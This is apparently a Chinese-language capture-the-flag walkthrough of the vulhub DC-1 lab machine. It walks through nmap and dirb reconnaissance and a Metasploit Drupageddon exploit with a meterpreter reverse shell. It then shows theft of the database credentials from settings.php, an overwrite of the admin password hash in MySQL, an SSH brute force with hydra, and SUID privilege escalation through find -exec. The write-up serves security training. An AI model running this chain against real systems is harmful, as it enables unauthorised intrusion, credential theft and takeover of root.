DC-1

vulhub DC-1靶机渗透

信息收集

root@kali:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.150.80  netmask 255.255.240.0  broadcast 192.168.159.255
        inet6 fe80::a00:27ff:fe5c:6526  prefixlen 64  scopeid 0x20<link>
        ether 08:00:27:5c:65:26  txqueuelen 1000  (Ethernet)
        RX packets 2  bytes 688 (688.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 65  bytes 10552 (10.3 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

---

ip与子网掩码相与得到网络的IP为 192.168.144.0/20

主机发现以及端口扫描

nmap -sS 192.168.144.0/20
192.168.146.232为开放主机
nmap -sS -Pn 192.168.146.232
Nmap scan report for DC-1.mshome.net (192.168.146.232)
Host is up (0.00058s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
MAC Address: 08:00:27:DB:C2:6F (Oracle VirtualBox virtual NIC)

开放80访问robots.txt
User-agent: *
Crawl-delay: 10
/# Directories
Disallow: /includes/
Disallow: /misc/
Disallow: /modules/
Disallow: /profiles/
Disallow: /scripts/
Disallow: /themes/
/# Files
Disallow: /CHANGELOG.txt
Disallow: /cron.php
Disallow: /INSTALL.mysql.txt
Disallow: /INSTALL.pgsql.txt
Disallow: /INSTALL.sqlite.txt
Disallow: /install.php
Disallow: /INSTALL.txt
Disallow: /LICENSE.txt
Disallow: /MAINTAINERS.txt
Disallow: /update.php
Disallow: /UPGRADE.txt
Disallow: /xmlrpc.php
/# Paths (clean URLs)
Disallow: /admin/
Disallow: /comment/reply/
Disallow: /filter/tips/
Disallow: /node/add/
Disallow: /search/
Disallow: /user/register/
Disallow: /user/password/
Disallow: /user/login/
Disallow: /user/logout/
/# Paths (no clean URLs)
Disallow: /?q=admin/
Disallow: /?q=comment/reply/
Disallow: /?q=filter/tips/
Disallow: /?q=node/add/
Disallow: /?q=search/
Disallow: /?q=user/password/
Disallow: /?q=user/register/
Disallow: /?q=user/login/
Disallow: /?q=user/logout/

通过update.txt install.txt获知
版本号为drupal 7.x
需求为

• PHP 5.2.4 (or greater) (http://www.php.net/).
• One of the following databases:
  • MySQL 5.0.15 (or greater) (http://www.mysql.com/).
  • MariaDB 5.1.44 (or greater) (http://mariadb.org/). MariaDB is a fully
    compatible drop-in replacement for MySQL.
  • PostgreSQL 8.3 (or greater) (http://www.postgresql.org/).
  • SQLite 3.4.2 (or greater) (http://www.sqlite.org/).

路径扫描

dirb http://192.168.146.232/
这里推荐一个目录扫描的工具SourceHacker
**SourceLeakHacker**
—- Scanning URL: http://192.168.146.232/ —-

• http://192.168.146.232/0 (CODE:200|SIZE:7648)
• http://192.168.146.232/admin (CODE:403|SIZE:7740)
• http://192.168.146.232/Admin (CODE:403|SIZE:7581)
• http://192.168.146.232/ADMIN (CODE:403|SIZE:7581)
• http://192.168.146.232/batch (CODE:403|SIZE:7875)
• http://192.168.146.232/cgi-bin/ (CODE:403|SIZE:291)
  ==> DIRECTORY: http://192.168.146.232/includes/
• http://192.168.146.232/index.php (CODE:200|SIZE:7648)
• http://192.168.146.232/install.mysql (CODE:403|SIZE:296)
• http://192.168.146.232/install.pgsql (CODE:403|SIZE:296)
• http://192.168.146.232/LICENSE (CODE:200|SIZE:18092)
  ==> DIRECTORY: http://192.168.146.232/misc/
  ==> DIRECTORY: http://192.168.146.232/modules/
• http://192.168.146.232/node (CODE:200|SIZE:7648)
  ==> DIRECTORY: http://192.168.146.232/profiles/
• http://192.168.146.232/README (CODE:200|SIZE:5376)
• http://192.168.146.232/robots (CODE:200|SIZE:1561)
• http://192.168.146.232/robots.txt (CODE:200|SIZE:1561)
• http://192.168.146.232/Root (CODE:403|SIZE:287)
  ==> DIRECTORY: http://192.168.146.232/scripts/
• http://192.168.146.232/search (CODE:403|SIZE:7584)
• http://192.168.146.232/Search (CODE:403|SIZE:7584)
• http://192.168.146.232/server-status (CODE:403|SIZE:296)
  ==> DIRECTORY: http://192.168.146.232/sites/
  ==> DIRECTORY: http://192.168.146.232/themes/
• http://192.168.146.232/user (CODE:200|SIZE:7501)
• http://192.168.146.232/web.config (CODE:200|SIZE:2178)
• http://192.168.146.232/xmlrpc.php (CODE:200|SIZE:42)

---

漏洞发现&漏洞利用

use msf
msfconsole
search drupal
use exploit/multi/http/drupal_drupageddon
set payload php/meterpreter/reverse_tcp
接收到反弹shell后ls查看目录

find flag1

cat flag1.txt

Every good CMS needs a config file - and so do you.

因为开放了22端口所以查看home下的用户
找到了flag4
home/flag4

cat flag4.txt

Can you use this same method to find or access the flag in root?

Probably. But perhaps it’s not that easy. Or maybe it is?
根据flag1.txt的提示找到网站的配置文件在site/default/settings.php
发现敏感信息

• flag2
• Brute force and dictionary attacks aren’t the
• only ways to gain access (and you WILL need access).
• What can you do with these credentials?

$databases = array (
‘default’ =>
array (
‘default’ =>
array (
‘database’ => ‘drupaldb’,
‘username’ => ‘dbuser’,
‘password’ => ‘R0ck3t’,
‘host’ => ‘localhost’,
‘port’ => ‘’,
‘driver’ => ‘mysql’,
‘prefix’ => ‘’,
),
),
);

---

python调用bash python -c ‘import pyt;pyt.spawn(“/bin/bash”)’建立持续性连接
利用上面发现的敏感信息登录mysql数据库
mysql -udbuser -pR0ck3t
select * from users;找到密文和用户
密文无法破解于是使用
update users set pass = 一个已知明文的密文 where name = ‘admin’;
加密的方式在/var/www/scripts/password-hash.sh
php password-hash.sh admin123
生成密文进行覆盖
登录drupal之后在dashboard获得flag3
Special PERMS will help FIND the passwd - but you’ll need to -exec that command to work out how to get what’s in the shadow.

提权

提示获取shadow肯定是要提权的了
那么ssh连接
ssh flag4@192.168.146.232
不知道密码尝试一下爆破
hydra -l flag4 -P /usr/share/john/password.lst 192.168.146.232
得到密码orange
进入终端之后
尝试使用suid提权
尝试使用以下命令将尝试查找具有root权限的SUID的文件，不同系统适用于不同的命令，一个一个试
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000-print2>/dev/null
find / -user root -perm -4000-exec ls -ldb {} ;

---

找到一个熟悉的find命令在列，进行find提权操作
先验证是否可行
/usr/bin/find flag4.txt -exec ‘whoami’ ;
root
验证成功
/usr/bin/find . -exec /bin/sh ; -quit
得到root权限
进入root目录

cd /root
# cat thefinalflag.txt
Well done!!!!

Hopefully you've enjoyed this and learned some new skills.

You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7